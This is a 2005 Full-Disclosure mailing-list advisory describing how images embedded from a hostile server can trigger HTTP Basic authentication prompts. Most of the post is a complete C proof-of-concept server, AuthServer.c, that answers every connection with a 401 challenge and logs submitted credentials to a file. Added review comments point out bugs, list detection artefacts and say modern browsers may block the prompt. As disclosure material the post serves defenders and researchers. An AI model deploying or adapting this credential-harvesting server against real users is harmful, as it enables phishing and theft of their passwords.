Cross-site http authentication
From: JustAsFire <justasfire () gmail com>
Date: Wed, 10 Aug 2005 19:18:52 +0300
Discovered: by JustAsFire JustAsFire () gmail com Vulnerable: Any web page in which you can insert images hosted on other servers. Description: If a web page contains an image from a site which requires authentication, an Username/Password prompt displaying host name and authentication realm will appear asking for username and password. A malicious http server could be used to log the credientials of the users who would authenticate. POC:

/*******************************************************************************
***name : AuthServer.c
***author : JustAsFire JustAsFire[at]gmail.com
***description : a very simple web server which sends a 401 Authorization request to anyone
*** connecting to it. If the client authenticates it stores the username and password
*** in the file userlog (base64-encoded, as sent on the wire -- not encrypted).
***
*** Reader notes (review): the server is single-threaded and handles one connection at a
*** time; it never parses the request line, so any TCP client gets the same 401.
*** Forensic artefacts a defender can look for: the fixed "Server: AuthServer/0.01 (Unix)"
*** header and the realm text below in proxy/IDS logs, and the "userlog" file appended
*** in the working directory of the process.
*** NOTE(review): current browsers have largely stopped showing credential prompts for
*** cross-origin subresource loads such as <img>; confirm per browser before treating the
*** described behaviour as current.
*********************************************************************************/
#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#define MAXPENDING 5    /* listen() backlog */
#define BUFFSIZE 10000  /* bytes read from each client, one read() call only */

/* Print the last errno message prefixed with mess and terminate with status 1. */
void Die(char *mess) { perror(mess); exit(1); }

/*
 * Look for a "Authorization: Basic " header in buffer.
 * Returns 1 if one was found (and its value was printed and appended to "userlog"),
 * 0 if the header is absent or the remainder of buffer after it is longer than 50 bytes.
 *
 * Observations grounded in the code: buffer comes straight from read() and is not
 * NUL-terminated by the caller, so strstr() scans until it finds a zero byte somewhere;
 * the copy loop writes strlen(p)-25 bytes starting at p+21 and never writes a terminator
 * into s, whose remaining bytes are uninitialised stack; fopen() is not checked for NULL.
 */
int GetCredientials(char *buffer){
    char s[200], *p;
    int i;
    FILE *f;
    p=strstr(buffer, "Authorization: Basic ");
    if (p){
        /* length cap on the remainder of the header; longer input is rejected */
        if ( strlen(p)>50 ){ printf("Buffer overflow atempt"); return 0; }
        /* offset 21 == strlen("Authorization: Basic "); the bound trims the tail */
        for (i=0; i+25 < strlen(p); i++) s[i]=p[21+i];
        printf("\n%s\n",s);
        /* append-mode log in the current working directory -- the on-disk artefact */
        f=fopen("userlog", "a");
        fprintf(f,"%s\n",s);
        fclose(f);
        return 1;
    } else return 0;
}

/*
 * Serve one accepted connection: read a single chunk of the request, and if it carries
 * no Basic credentials answer with a fixed 401 challenge. The socket is closed either way,
 * so a browser that retries with credentials arrives as a new connection.
 */
void HandleClient(int sock){
    char buffer[BUFFSIZE];
    char *s; /* unused; shadowed by the inner s below */
    /* read() may return fewer bytes than the request; only a negative result is fatal */
    if (read(sock, buffer, BUFFSIZE) <0) Die("Failed to receive bytes from client");
    if ( GetCredientials(buffer)==0 ){
        /* Static challenge. Reason phrase is non-standard ("Authorization Require"),
         * Transfer-Encoding: chunked is announced with no body, and the realm string is
         * a distinctive indicator for detection. write() result is not checked. */
        char *s="HTTP/1.1 401 Authorization Require\nServer: AuthServer/0.01 (Unix)\nWWW-Authenticate: Basic realm=\" ...It's a scam don't do it... \"\nKeep-Alive: timeout=15, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=iso-8859-1\n\n";
        write(sock,s,strlen(s));
    }
    close(sock);
}

/*
 * Usage: AuthServer <port>
 * Binds a TCP listener on all IPv4 interfaces (INADDR_ANY) at the given port, then
 * accepts connections forever, handling each one sequentially. argv[1] goes through
 * atoi(), so a non-numeric port silently becomes 0 (kernel-chosen port).
 */
int main (int argc, char *argv[]) {
    int serversock, clientsock;
    struct sockaddr_in server, client;
    if ( argc != 2 ) { fprintf(stderr, "USAGE: AuthServer <port>\n"); exit(1); }
    if ((serversock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { Die("Failed to create socket"); }
    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = htons(atoi(argv[1]));
    if (bind(serversock, (struct sockaddr *) &server, sizeof(server)) < 0) { Die("Failed to bind the server socket"); }
    if (listen(serversock, MAXPENDING) < 0) { Die("Failed to listen on server socket"); }
    fprintf(stdout,"Created by: JustAsFire -- JustAsFire[at]gmail.com\n");
    fprintf(stdout,"Listening for connections...\n");
    while (1) {
        unsigned int clientlen = sizeof(client);
        if ((clientsock = accept(serversock, (struct sockaddr *) &client, &clientlen)) < 0) { Die("Failed to accept client connection"); }
        /* peer address is logged to stdout only; nothing else about the client is recorded */
        fprintf(stdout, "Client connected: %s\n", inet_ntoa(client.sin_addr));
        HandleClient(clientsock);
    }
}

_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/